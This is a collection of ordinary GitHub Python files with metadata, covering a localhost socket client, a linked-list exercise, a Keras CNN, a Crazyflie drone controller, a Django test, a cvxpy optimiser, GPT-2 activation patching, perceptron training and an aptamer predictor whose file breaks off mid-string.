+{"seq_id":"14887037316","text":"import socket\nimport time\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('localhost', 1234))\n\nfor i in range(2):\n s.send(bytes(\"open\", \"utf-8\"))\n msg = s.recv(1024)\n print(msg.decode(\"utf-8\"))\n # decimal_list = list(msg)\n # binary_list = [bin(decimal)[2:].zfill(8) for decimal in decimal_list]\n # bits_string = ' '.join(binary_list)\n # print(bits_string)\n # time.sleep(1)\n\ns.send(bytes(\"close\", \"utf-8\"))\ns.close()\nprint('Connection closed.')\n","repo_name":"kunal-mod/networking","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"6698252164","text":"from copy import deepcopy\nfrom _utils import SingleLinkedList\n\n# Runtime: O(n)\n# Memory: O(1)\ndef partition(head, value):\n initial_tail = head.tail()\n current_tail = initial_tail\n current = head\n prev = None\n while current != initial_tail:\n node = current\n current = node.next\n if node.value >= value:\n if prev:\n prev.next = node.next\n else:\n # If there was no prev the head changed\n head = node.next\n current_tail.next = node\n node.next = None\n current_tail = node\n else:\n prev = node\n return head\n\nif __name__ == '__main__':\n head = SingleLinkedList(3)\n node = head\n for x in [5, 8, 5, 10, 2, 1]:\n node.next = SingleLinkedList(x)\n node = node.next\n head2 = deepcopy(head)\n\n print('INITIAL\\t\\t', head)\n print('PARTITION\\t', partition(head, 5))\n print('INITIAL\\t\\t', head2)\n print('PARTITION\\t', partition(head2, 3))\n","repo_name":"sebamenabar/CTCI-Python-Solutions","sub_path":"2.4 - Partition.py","file_name":"2.4 - Partition.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70142531716","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport scipy\nimport keras\nfrom keras.utils import to_categorical\nfrom keras.models import Sequential,Input,Model\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.advanced_activations import LeakyReLU\n\n\n#-------------------------data processing-------------------------------------\nx_train = pd.read_csv(sys.argv[1], header = None).values\nx_test = pd.read_csv(sys.argv[2], header = None).values\ny_train = np.asarray(list(x_train[:,0]))\nx_train = x_train[:,1:]\nx_test = x_test[:,1:]\ntrain_data = list()\ntest_data = list()\nfor i in range(len(x_train)):\n train_data.append(x_train[i].reshape(32,32))\nfor i in range(len(x_test)):\n test_data.append(x_test[i].reshape(32, 32))\ntrain_data = np.asarray(train_data)\ntest_data = np.asarray(test_data)\nclasses = np.unique(y_train)\nnClasses = len(y_train)\ntrain_data = train_data.reshape(-1,32,32,1)\ntest_data = test_data.reshape(-1,32,32,1)\ntrain_data = train_data.astype('float32')\ntest_data = test_data.astype('float32')\ntrain_data = train_data / 255.\ntest_data = test_data / 255.\ny_train_one_hot = to_categorical(y_train)\n\n#----------------------modelling the data-------------------------------------------\nbatchsize = 100\nepochs = 21\nnum_classes = 46\n\n#--------------------------architecture-------------------------------\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),input_shape=(32,32,1),padding='same'))\nmodel.add(LeakyReLU(alpha=0.1))\nmodel.add(MaxPooling2D((2, 2),padding='same'))\nmodel.add(Conv2D(64, (3, 3),padding='same'))\nmodel.add(LeakyReLU(alpha=0.1))\nmodel.add(MaxPooling2D(pool_size=(2, 2),padding='same'))\nmodel.add(Conv2D(128, (3, 3),padding='same'))\nmodel.add(LeakyReLU(alpha=0.1))\nmodel.add(MaxPooling2D(pool_size=(2, 2),padding='same'))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='tanh'))\nmodel.add(Dense(128,activation='tanh'))\n#model.add(LeakyReLU(alpha=0.1))\nmodel.add(Dense(num_classes, activation='softmax'))\n\n#----------------------------compiling the model---------------------------------\nmodel.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(),metrics=['accuracy'])\n#model.summary()\n\n\n#----------------------------------training the model------------------------------\nmodel_train = model.fit(train_data,y_train_one_hot,batch_size=batchsize,epochs=epochs)\n\npredictions = model.predict_classes(test_data,batch_size=10)\nnp.savetxt(sys.argv[3],predictions)","repo_name":"Maestro100/Machine-Learning","sub_path":"Devanagri handwritten recognition using CNN and Kaggle TGS salt challenge/CNN/cnna.py","file_name":"cnna.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"10507114695","text":"import os\nimport sys\n\nimport cflib.crtp\nfrom PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QPushButton\nfrom cflib.crazyflie import Crazyflie\nfrom cflib.crazyflie.log import LogConfig\nfrom cflib.positioning.motion_commander import MotionCommander\nfrom cflib.utils.multiranger import Multiranger\n\nfrom drone import Drone\n\ncflib.crtp.init_drivers(enable_debug_driver=False)\n\n\ndef find_available_drones():\n return cflib.crtp.scan_interfaces()\n\n\nclass CrazyDrone(Drone):\n\n def __init__(self, link_uri):\n super().__init__()\n\n cache = \"./cache\"\n if getattr(sys, 'frozen', False):\n cache = sys._MEIPASS + os.path.sep + \"cache\"\n\n self._cf = Crazyflie(rw_cache=cache)\n self.motion_commander = None\n self.multiranger = None\n\n # maximum speeds\n self.max_vert_speed = 1\n self.max_horiz_speed = 1\n self.max_rotation_speed = 90\n\n self.logger = None\n\n # Connect some callbacks from the Crazyflie API\n self._cf.connected.add_callback(self._connected)\n self._cf.disconnected.add_callback(self._disconnected)\n self._cf.connection_failed.add_callback(self._connection_failed)\n self._cf.connection_lost.add_callback(self._connection_lost)\n\n print('Connecting to %s' % link_uri)\n\n # Try to connect to the Crazyflie\n self._cf.open_link(link_uri)\n\n # Variable used to keep main loop occupied until disconnect\n self.is_connected = True\n\n def init(self):\n pass\n\n def _connected(self, link_uri):\n \"\"\" This callback is called form the Crazyflie API when a Crazyflie\n has been connected and the TOCs have been downloaded.\"\"\"\n print('Connected to %s' % link_uri)\n\n self.connection.emit(\"progress\")\n\n # The definition of the logconfig can be made before connecting\n self.logger = LogConfig(\"Battery\", 1000) # delay\n self.logger.add_variable(\"pm.vbat\", \"float\")\n\n try:\n self._cf.log.add_config(self.logger)\n self.logger.data_received_cb.add_callback(lambda e, f, g: self.batteryValue.emit(float(f['pm.vbat'])))\n # self.logger.error_cb.add_callback(lambda: print('error'))\n self.logger.start()\n except KeyError as e:\n print(e)\n\n self.connection.emit(\"on\")\n self.motion_commander = MotionCommander(self._cf, 0.5)\n self.multiranger = Multiranger(self._cf, rate_ms=50)\n self.multiranger.start()\n\n def _connection_failed(self, link_uri, msg):\n \"\"\"Callback when connection initial connection fails (i.e no Crazyflie\n at the speficied address)\"\"\"\n print('Connection to %s failed: %s' % (link_uri, msg))\n self.is_connected = False\n self.connection.emit(\"off\")\n\n def _connection_lost(self, link_uri, msg):\n \"\"\"Callback when disconnected after a connection has been made (i.e\n Crazyflie moves out of range)\"\"\"\n print('Connection to %s lost: %s' % (link_uri, msg))\n self.connection.emit(\"off\")\n\n def _disconnected(self, link_uri):\n \"\"\"Callback when the Crazyflie is disconnected (called in all cases)\"\"\"\n print('Disconnected from %s' % link_uri)\n self.is_connected = False\n self.connection.emit(\"off\")\n\n def take_off(self):\n if self._cf.is_connected() and self.motion_commander and not self.motion_commander._is_flying:\n self.motion_commander.take_off()\n self.is_flying_signal.emit(True)\n\n def land(self):\n if self._cf.is_connected() and self.motion_commander and self.motion_commander._is_flying:\n self.motion_commander.land()\n self.is_flying_signal.emit(False)\n\n def stop(self):\n if not (self.logger is None):\n self.logger.stop()\n if self.motion_commander:\n self.motion_commander.land()\n if self.multiranger:\n self.multiranger.stop()\n self._cf.close_link()\n\n def is_flying(self):\n if self._cf.is_connected() and self.motion_commander:\n return self.motion_commander._is_flying\n\n return False\n\n def process_motion(self, _up, _rotate, _front, _right):\n if self.motion_commander:\n\n # WARNING FOR CRAZYFLY\n # positive X is forward, # positive Y is left # positive Z is up\n\n velocity_z = _up * self.max_vert_speed\n velocity_yaw = _rotate * self.max_rotation_speed\n velocity_x = _front * self.max_horiz_speed\n velocity_y = - _right * self.max_horiz_speed\n # print(\"PRE\", velocity_x, velocity_y, velocity_z, velocity_yaw)\n\n # print(\"POST\", velocity_x, velocity_y, velocity_z, velocity_yaw)\n if self.motion_commander._is_flying:\n self.motion_commander._set_vel_setpoint(velocity_x, velocity_y, velocity_z, velocity_yaw)\n\n\nif __name__ == \"__main__\":\n app = QApplication([])\n\n available = find_available_drones()\n print(str(available[0][0]))\n print('availables crazyflies', str(available))\n\n if len(available) > 0:\n drone = CrazyDrone(available[0][0])\n\n start_button = QPushButton(\"take off\")\n stp_button = QPushButton(\"Land\")\n start_button.clicked.connect(drone.take_off)\n stp_button.clicked.connect(drone.land)\n widget = QWidget()\n layout = QHBoxLayout()\n widget.setLayout(layout)\n layout.addWidget(start_button)\n layout.addWidget(stp_button)\n drone.batteryValue.connect(lambda status: print('batt', status))\n drone.is_flying_signal.connect(lambda status: print('flying?', status))\n drone.connection.connect(lambda status: print('connection', status))\n drone.init()\n\n widget.show()\n sys.exit(app.exec_())\n drone.stop()","repo_name":"jeremie-garcia/dronible","sub_path":"code/crazydrone.py","file_name":"crazydrone.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"43737462096","text":"\"\"\"Tests for the ``cmsplugin_blog_language_publish`` app's template tags.\"\"\"\nfrom django.test import TestCase\n\nfrom cmsplugin_blog.models import Entry\n\nfrom ..templatetags.cmsplugin_blog_language_publish_tags import (\n get_published_entries)\nfrom .factories import EntryLanguagePublishFactory\n\n\nclass GetPublishedEntryTestCase(TestCase):\n \"\"\"Test for the ``get_published_entry`` template tag.\"\"\"\n longMessage = True\n\n def setUp(self):\n self.entry_langpub = EntryLanguagePublishFactory(published=True)\n self.entry_not_published = EntryLanguagePublishFactory()\n\n def test_template_tag(self):\n \"\"\"Test for the ``get_published_entry`` template tag.\"\"\"\n entries = Entry.objects.all()\n entries = get_published_entries(entries, 'en')\n self.assertEqual(len(entries), 1, msg=(\n 'Should return the entries that are published.'))\n","repo_name":"bitlabstudio/cmsplugin-blog-language-publish","sub_path":"cmsplugin_blog_language_publish/tests/cmsplugin_blog_language_publish_tags_tests.py","file_name":"cmsplugin_blog_language_publish_tags_tests.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30494481743","text":"import cvxpy as cvx\nimport numpy as np\n\n\ndef cov_to_cor(covariances):\n \"\"\"\n :param covariances: a 2d numpy array of covariances\n :return: a 2d numpy array of correlations\n \"\"\"\n correlations = np.zeros(covariances.shape, dtype=np.float64)\n for i in range(covariances.shape[0]):\n for j in range(covariances.shape[1]):\n correlations[i, j] = covariances[i, j] / (covariances[i, i] * covariances[j, j])\n\n return correlations\n\n\ndef md_mvo(corr, card):\n '''\n :param card: The number of assets to be chosen (not including the rf asset (integer)\n :param corr: The nxn correlation matrix (np.array)\n '''\n n = len(corr[:, 0])\n z = cvx.Variable((n, n), boolean=True)\n y = cvx.Variable(n, boolean=True)\n cons = []\n for i in range(n):\n for j in range(n):\n cons.append(z[i][j] <= y[i])\n cons.append(cvx.sum(z[:, i]) == 1)\n\n cons.append(cvx.sum(y, axis=0) == card)\n obj = cvx.Maximize(cvx.sum(corr * z))\n prob = cvx.Problem(obj, cons)\n prob.solve()\n buckets = np.round(y.value)\n return buckets\n","repo_name":"HiImKarl/Capstone","sub_path":"business_logic/md_mvo.py","file_name":"md_mvo.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"6405079827","text":"import sys\r\nimport numpy as np\r\nimport torch\r\nfrom torch.nn.functional import log_softmax\r\nfrom transformers import GPT2Tokenizer, GPT2LMHeadModel\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\n\r\nmodel_dir = '/home/leiyu/scratch/cma_hallucination/models/gpt2-xl/'\r\ndata_dir = '/home/leiyu/scratch/cma_hallucination/data/'\r\n\r\ntorch.set_grad_enabled(False)\r\nnum_layers = 48\r\nmodel_hidden_dim = 1600\r\nn_intervene = 10\r\nn_hall_sample = 1000\r\nmodule_kinds = ['res', 'attn', 'mlp']\r\n\r\n\r\ndef untuple(x):\r\n return x[0] if isinstance(x, tuple) else x\r\n\r\n\r\ndef get_key_pos_effects(effects, row):\r\n # effects: (n_layer, seq_len)\r\n effects_subj_first = effects[:, row['cue entity start idx']]\r\n if row['cue entity end idx'] > row['cue entity start idx'] + 1:\r\n effects_subj_mid = effects[:, 1 + row['cue entity start idx']:row['cue entity end idx']].mean(-1)\r\n else:\r\n effects_subj_mid = effects_subj_first\r\n effects_subj_last = effects[:, row['cue entity end idx']]\r\n\r\n effects_first_after = effects[:, 1 + row['cue entity end idx']]\r\n effects_further = effects[:, 1 + row['cue entity end idx']:-1].mean(-1)\r\n effects_last = effects[:, -1]\r\n\r\n igs_key_pos = torch.stack([\r\n effects_subj_first, effects_subj_mid, effects_subj_last, effects_first_after, effects_further, effects_last\r\n ], -1)\r\n\r\n return igs_key_pos # (n_layer, 6)\r\n\r\n\r\ndef run_get_noise_and_te(model, tokenizer, prompt, true_obj_id, hall_obj_id,\r\n subj_start, subj_end,\r\n batch_size=100, intervene_ent='subj'):\r\n batch_inputs = tokenizer(\r\n [prompt] * (1 + batch_size), return_tensors='pt'\r\n )['input_ids'].to(model.device)\r\n\r\n def make_wte_noise_hook(noise, intervene_start, intervene_end):\r\n\r\n def wte_noise_hook(module, inputs, outputs):\r\n outputs_0 = untuple(outputs)\r\n outputs_0[1:, intervene_start:intervene_end] += noise.to(outputs_0.device)\r\n return outputs\r\n\r\n return wte_noise_hook\r\n\r\n if intervene_ent == 'subj':\r\n intervene_start, intervene_end = subj_start, subj_end + 1\r\n else:\r\n intervene_start, intervene_end = subj_end + 1, batch_inputs.shape[1] - 1\r\n\r\n noise = torch.randn(batch_size, 1, model_hidden_dim)\r\n emb_hook = model.transformer.wte.register_forward_hook(\r\n make_wte_noise_hook(noise, intervene_start, intervene_end)\r\n )\r\n with torch.no_grad():\r\n logits = model(batch_inputs.to(model.device)).logits[:, -1] # (B, vocab_size)\r\n obj_logit_diffs = (logits[:, hall_obj_id] - logits[:, true_obj_id]).cpu()\r\n\r\n valid_batch_idx = (obj_logit_diffs[1:] < obj_logit_diffs[0]).nonzero(as_tuple=True)[0]\r\n # print('valid_batch_idx: ', valid_batch_idx)\r\n n_valid_noise = len(valid_batch_idx)\r\n valid_noise_rate = float(n_valid_noise) / batch_size\r\n\r\n if 1 < len(valid_batch_idx) < n_intervene:\r\n valid_batch_idx = torch.cat([\r\n valid_batch_idx, valid_batch_idx[-1].repeat(n_intervene - len(valid_batch_idx))\r\n ])\r\n elif len(valid_batch_idx) > n_intervene:\r\n valid_batch_idx = valid_batch_idx[:n_intervene]\r\n else:\r\n valid_batch_idx = torch.arange(n_intervene)\r\n\r\n if len(valid_batch_idx) != n_intervene:\r\n print(len(valid_batch_idx))\r\n\r\n emb_noises = noise[valid_batch_idx]\r\n TEs = obj_logit_diffs[1:][valid_batch_idx] - obj_logit_diffs[0]\r\n\r\n emb_hook.remove()\r\n torch.cuda.empty_cache()\r\n\r\n return emb_noises, TEs, obj_logit_diffs[0], valid_noise_rate\r\n\r\n\r\ndef run_with_activation_patch(model, batch_inputs, batch_noise,\r\n intervene_start, intervene_end,\r\n true_obj_id, hall_obj_id,\r\n patch_layer_idx, patch_seq_idx,\r\n module_kind='res'):\r\n hooks = []\r\n\r\n def make_wte_noise_hook(noise, intervene_start, intervene_end):\r\n\r\n def wte_noise_hook(module, inputs, outputs):\r\n outputs_0 = untuple(outputs)\r\n outputs_0[1:, intervene_start:intervene_end] += noise.to(outputs_0.device).unsqueeze(0)\r\n return outputs\r\n\r\n return wte_noise_hook\r\n\r\n emb_hook = model.transformer.wte.register_forward_hook(\r\n make_wte_noise_hook(batch_noise, intervene_start, intervene_end)\r\n )\r\n hooks.append(emb_hook)\r\n\r\n # Define the model-patching hook for computing the indirect effects\r\n for i in range(len(patch_layer_idx)):\r\n\r\n def make_patching_hook(patched_batch_id, patched_seq_id):\r\n def patching_hook(module, inputs, outputs):\r\n outputs_0 = untuple(outputs) # (B, seq_len, hidden_dim)\r\n outputs_0[patched_batch_id, patched_seq_id] = outputs_0[0, patched_seq_id]\r\n\r\n return outputs\r\n\r\n return patching_hook\r\n\r\n if module_kind == 'res':\r\n hook_i = model.transformer.h[patch_layer_idx[i]].register_forward_hook(\r\n make_patching_hook(i + 2, patch_seq_idx[i]))\r\n hooks.append(hook_i)\r\n elif module_kind == 'attn':\r\n patch_layer_start = max(0, patch_layer_idx[i] - 5)\r\n patch_layer_end = min(patch_layer_idx[i] + 5, num_layers)\r\n for j in range(patch_layer_start, patch_layer_end):\r\n hook_ij = model.transformer.h[j].attn.register_forward_hook(\r\n make_patching_hook(i + 2, patch_seq_idx[i]))\r\n hooks.append(hook_ij)\r\n elif module_kind == 'mlp':\r\n patch_layer_start = max(0, patch_layer_idx[i] - 5)\r\n patch_layer_end = min(patch_layer_idx[i] + 5, num_layers)\r\n for j in range(patch_layer_start, patch_layer_end):\r\n hook_ij = model.transformer.h[j].mlp.register_forward_hook(\r\n make_patching_hook(i + 2, patch_seq_idx[i]))\r\n hooks.append(hook_ij)\r\n else:\r\n raise ValueError('Invalid patching module kind')\r\n\r\n # With the patching rules defined, run the patched model in inference.\r\n with torch.no_grad():\r\n batch_log_probs = log_softmax(model(batch_inputs).logits[:, -1], -1).cpu() # (B, vocab_size)\r\n for hook in hooks:\r\n hook.remove()\r\n torch.cuda.empty_cache()\r\n\r\n log_prob_diffs = batch_log_probs[:, hall_obj_id] - batch_log_probs[:, true_obj_id]\r\n\r\n return log_prob_diffs[2:] - log_prob_diffs[1]\r\n\r\n\r\ndef main(module_kind):\r\n device = torch.device('cuda')\r\n model = GPT2LMHeadModel.from_pretrained(model_dir).to(device)\r\n model.eval()\r\n\r\n tokenizer = GPT2Tokenizer.from_pretrained(model_dir)\r\n tokenizer.pad_token = tokenizer.eos_token\r\n pararel_df = pd.read_csv(data_dir + 'dataframes/pararel_questions.csv')\r\n\r\n # sampled_hall_idx = np.load(data_dir + 'results/pararel_sampled_hall_idx_act.npy')\r\n sampled_hall_idx = pararel_df.loc[\r\n pararel_df['is hallucination'] == 1\r\n ].sample(n_hall_sample).index\r\n pararel_hall_df = pararel_df.iloc[sampled_hall_idx].reset_index(drop=True)\r\n np.save(data_dir + 'results/pararel_sampled_hall_idx_act_{}.npy'.format(module_kind), np.array(sampled_hall_idx))\r\n\r\n results = {\r\n 'TE': [], 'IE': [],\r\n 'y_0': [], 'noise': []\r\n }\r\n valid_noise_rate = []\r\n for i, row in tqdm(pararel_hall_df.iterrows(), total=pararel_hall_df.shape[0]):\r\n seq_len = len(tokenizer(row['prompt'])['input_ids'])\r\n true_obj_id, hall_obj_id = row['true object first token id'], row['predicted object first token id']\r\n subj_start, subj_end = row['cue entity start idx'], row['cue entity end idx']\r\n batch_size = seq_len * num_layers + 2\r\n batch_inputs = tokenizer(\r\n [row['prompt']] * batch_size, return_tensors='pt'\r\n )['input_ids'].to(device)\r\n\r\n noise_i, TE, y_0, val_noise_r = run_get_noise_and_te(\r\n model, tokenizer, row['prompt'], true_obj_id, hall_obj_id,\r\n subj_start, subj_end, intervene_ent='subj')\r\n\r\n results['y_0'].append(y_0) # (1,)\r\n results['TE'].append(TE.mean()) # (1,)\r\n results['noise'].append(noise_i) # (n_intervene, 1, 1600)\r\n valid_noise_rate.append(val_noise_r)\r\n\r\n patch_layer_idx = torch.arange(num_layers).repeat_interleave(seq_len)\r\n patch_seq_idx = torch.arange(seq_len).repeat(num_layers)\r\n\r\n IEs = []\r\n for j in range(n_intervene):\r\n IEs_ij = run_with_activation_patch(\r\n model, batch_inputs, noise_i[j],\r\n subj_start, subj_end+1,\r\n true_obj_id, hall_obj_id,\r\n patch_layer_idx, patch_seq_idx,\r\n module_kind=module_kind\r\n )\r\n torch.cuda.empty_cache()\r\n\r\n key_pos_IEs = get_key_pos_effects(IEs_ij.view(num_layers, seq_len), row)\r\n IEs.append(key_pos_IEs) # (num_layer, 6)\r\n\r\n results['IE'].append(torch.stack(IEs).mean(0))\r\n\r\n for k, v in results.items():\r\n torch.save(\r\n torch.stack(v), data_dir + 'results/pararel/{}_{}_loc.pt'.format(k, module_kind)\r\n )\r\n\r\n np.save(data_dir + 'results/pararel/valid_noise_rate_{}_loc.npy'.format(module_kind), valid_noise_rate)\r\n\r\n\r\nif __name__ == '__main__':\r\n module_kind = module_kinds[int(sys.argv[1])]\r\n main(module_kind)\r\n # python activation_patching.py 0/1/2\r\n # 0/1/2 for computing IEs of token/attn/mlp hidden states respectively\r\n # each run will return an indirect effect tensor of shape (1000, 48, 6) named \"IE_module-kind_loc.pt\"\r\n","repo_name":"jadeleiyu/hallucination_mech_evol","sub_path":"src/hall_mech/cpi.py","file_name":"cpi.py","file_ext":"py","file_size_in_byte":9509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14948011541","text":"# Модуль получения нейросетевой модели БФ, используя логистическую ФА (сигмоидальную).\n# И нахождения наименьшее, возможное для обучения, количество векторов.\n\n\nfrom DataIO import *\nfrom neuronal import *\nfrom Graphic import *\nimport itertools\n\n# Функция записывает в файл процесс обучения \n# Hа минимально возможном количестве векторов\ndef write_min(combination, outputFile, W, kind):\n # запишем в файл найденные значения\n file = open(outputFile, 'w')\n file.write('set:\\n')\n for i,x in enumerate(combination[1]):\n file.write('X(' + str(i+1) + ') = (' + str(x[0])[4:-1] + ')')\n file.write('\\n')\n file.write('\\n')\n\n nu = 0.3 # норма обучения\n E = 1 # необходимо для начала цикла прохода по эпохам\n k = 0 # необходимо для начала отсчёта эпох\n\n arrayE = list() # список всех суммарнах квадратичных ошибок\n arrayK = list() # список всех эпох\n\n Y = list() # вектор для хранения полученного реального выхода текущей эпохи\n\n F = [i[1] for i in combination[1]] # вектор значений БФ, на котром происходит обучение\n\n #Обучение до тех пор, пока квадратичная ошибка не будет = 0\n while E != 0:\n #Записываем последние полученные весовые коэффициенты на случай получения нулевой ошибки\n prev_W = list(W)\n\n #Проверка на достижение нулевой ошибки на последних найденных весовых коэффициентах\n for (x, f) in combination[1]:\n # 1)Подесчет net\n n = net(W, x)\n\n # 2)Реальный выход\n y = actual_NN(n)\n Y.append(y)\n\n # 3)Ошибку дельта\n d = delta(f, y)\n\n # 5)Подсчет сумарной квадратичной ошибки\n E = totalError(Y, F)\n\n #Запись полученных данные в файл\n write_Data(file, k, Y, prev_W, E)\n\n Y = list() #Очистка вектора от полученных данных\n\n # Если ошибка(Е) != 0 выполняется перерасчёт весовых коэффициентов\n if E != 0:\n\n for (x,f) in combination[1]:\n n = net(W, x)\n y = actual_NN(n)\n d = delta(f, y)\n\n #Пересчеи W(Синаптические вес)\n W = recount_W(W, x, d, n, nu, kind)\n\n #Добавление номера текущей эпохи и найденную в ней среднеквадратичную ошибку\n arrayK.append(k)\n arrayE.append(E)\n \n k += 1#Увеличивание количество эпох +1\n\n #Построение графиа зависимости среднеквадратичной ошибки от эпохи\n drawGraph(arrayE, arrayK, kind, outputFile)\n\n\n#Функция проверяется комбинация на \"обучаемость\"\n#W: входные значения весовых коэффициентов\n#combination: найденная наилучшая комбинация векторов\n#kind: вид ФА threshold - пороговая, logistics - логистическая\n#В случае успеха возвращается W, k(эпоха), иначе W, 0\ndef check_combination(W, combination, kind):\n nu = 0.3 #норма\n E = 1 #Ср^2 ошибка\n k = 0 #Эпох\n\n Y = list() #Вектор для хранения полученного реального выхода текущей эпохи\n\n #Обучение до достигжения ошибок = 0, если это возможно\n #Для этого в качестве \"порога\" поиска берется ограниченное число эпох для обучения\n epochs = 200\n while E != 0 and k < epochs:\n e = 0 #Переменная для поиска ошибок при обучении\n\n # запоминаем последние полученные весовые коэффициенты на случай получения нулевой ошибки\n prev_W = list(W)\n\n # проверим выходной вектор на наличие ошибок\n for (x, f) in combination:\n n = net(W, x)\n y = actual_NN(n)\n d = delta(f, y)\n\n #Если имеется ошибкв, прибавим её к переменной для отслеживания ошибок обучения\n if d != 0:\n e += 1\n\n #В случае ошибки выходного вектора\n if e != 0:\n e = 0\n #Обучение на выборке\n for (x,f) in combination:\n n = net(W, x)\n y = actual_NN(n)\n d = delta(f, y)\n\n if d != 0:\n e += 1 # ошибка для обучения на векторе\n\n # 4) пересчитываем W\n W = recount_W(W, x, d, n, nu, kind = kind)\n E = e \n k += 1 #Следующей эпохе +1\n\n if k < epochs:\n return W, k\n else:\n return W, 0\n\n\n#Функция поиска минимального вектора для обучения\n#inputW: входные значения весовых коэффициентов\n#inputF: значения БФ\n#X: вектор с значениями от 0 до 16 в двоичном представлении\n#outputFile: имя файла записи\n#kind: вид ФА threshold - пороговая, logistics - логистическая\ndef education_AF(inputW, F, X, outputFile, kind):\n for i in range(2**4, 2, -1):\n #Генерация комбинаций векторов различных длин\n combinations = list(itertools.combinations(zip(X, F), i))\n\n arrayKN = list()\n\n #Проверка каждой комбинации\n for combination in combinations:\n\n Y = list()\n\n W, k = check_combination(list(inputW), combination, kind)\n\n if k != -1:\n\n #Проверка успешности обучения\n for (x, f) in zip(X, F):\n n = net(W, x)\n y = actual_NN(n)\n Y.append(y)\n\n # 5)Подсчет суммарной квадратичной ошибки\n E = totalError(Y, F)\n\n #Запись найденных векторов, кол-во эпох обучения и набор весов\n if E == 0:\n arrayKN.append((k, combination, W))\n best_combination = sorted(arrayKN, key = lambda education: education[0])[0]\n\n #Запись в файл минимальный набор с минимальным количеством эпох\n write_min(best_combination, outputFile, list(inputW), kind)\n","repo_name":"SaintShrimps/SimpleOneLayrNN","sub_path":"searchMinV.py","file_name":"searchMinV.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33449269266","text":"import numpy as np\r\nimport random\r\nimport tkinter as tk\r\n\r\nclass interaction_approximator():\r\n \"\"\"\r\n\r\n This class is designed to hold all functions designed to develop predictions of ssDNA aptamer sequences.\r\n\r\n \"\"\"\r\n\r\n def __init__(self):\r\n\r\n \"\"\"\r\n One dictionary hold data pertaining to bond probability and hydrogen bonding.\r\n Each amino acid is referenced by one-letter code, existing as keys.\r\n As values, data pertaining to each nucleotide in relation to the given amino.\r\n\r\n This dictionary holds the probability data in respect to bonds which may occur:\r\n the first value is the one letter nucleotide code used to develop a predicted string,\r\n the second element is the pseudopairing probability and quantity,\r\n the third element is the hydrogen bond probability and quantity.\r\n\r\n \"\"\"\r\n\r\n self.peptide_collection_text_box = ''\r\n\r\n # the value is in units of kcal/mol\r\n self.hydrogen_bond_strength = 0.0000000001\r\n\r\n # Each dictionary holds the probability data in respect to hydrogen bonds which may occur\r\n # the first value is the one letter nucleotide code used to develop a predicted string\r\n # the second element is the pseudopairing probability and quantity\r\n # the third element is the hydrogen bond probability and quantity\r\n\r\n # this dictionary is a dictionary of dictionaries -- the first key is a one letter amino\r\n # acid code -- the second key is a nucleotide which allows access to probability associated values\r\n self.association_probability_amino_to_nucleotide_dict_dict = {\r\n 'S': {'A': ((1, 0.4), (6, 2.3)), 'G': ((0, 0), (1, 0.4)), 'C': ((0, 0), (3, 12.5))},\r\n 'N': {'A': ((10, 3.8), (4, 1.5)), 'G': ((0, 0), (1, 1.2)), 'C': ((1, 4.2), (0, 0)), 'T': ((2, 8.3), (2, 8.3))},\r\n 'Q': {'A': ((2, 0.8), (4, 1.5)), 'G': ((0, 0), (2, 2.4)), 'T': ((4, 16.7), (1, 4.2))},\r\n 'D': {'A': ((7, 2.6), (10, 3.8)), 'G': ((28, 34.1), (2, 2.4)), 'T': ((0, 0), (1, 4.2))},\r\n 'E': {'A': ((1, 0.4), (3, 1.1)), 'G': ((2, 2.4), (7, 8.5)), 'T': ((0, 0), (1, 4.2))},\r\n 'K': {'T': ((0, 0), (1, 4.2))},\r\n 'T': {'C': ((1, 4.2), (0, 0))},\r\n 'R': {'C': ((3, 12.5), (0, 0))}\r\n }\r\n\r\n # this dictionary holds data related to each nucleotide\r\n self.association_probability_nucleotide_to_amino_dict_dict = {\r\n 'A': {'S': ((1, 0.4), (6, 2.3)), 'N': ((10, 3.8), (4, 1.5)), 'Q': ((2, 0.8), (4, 1.5)), 'D': ((7, 2.6), (10, 3.8)),\r\n 'E': ((1, 0.4), (3, 1.1))},\r\n 'G': {'S': ((0, 0), (1, 0.4)), 'N': ((0, 0), (1, 1.2)), 'Q': ((0, 0), (2, 2.4)), 'D': ((28, 34.1), (2, 2.4)), 'E': ((2, 2.4), (7, 8.5))},\r\n 'C': {'S': ((0, 0), (3, 12.5)), 'N': ((1, 4.2), (0, 0)), 'T': ((1, 4.2), (0, 0)), 'R': ((3, 12.5), (0, 0))},\r\n 'T': {'N': ((2, 8.3), (2, 8.3)), 'Q': ((4, 16.7), (1, 4.2)), 'D': ((0, 0), (1, 4.2)), 'E': ((0, 0), (1, 4.2)), 'K': ((0, 0), (1, 4.2))}\r\n }\r\n\r\n # the primer sequences must be scored to aid in reducing false positives and obfuscating results.\r\n # will be used to develop a minimum score to test sequences against for study validity\r\n self.null_pseudopair_strength_and_peptide_fragment = (0, '')\r\n self.p5 = \"TCGTCGGCAGCGTCAGATGTGTATAAGAGACAG\"\r\n self.p7 = 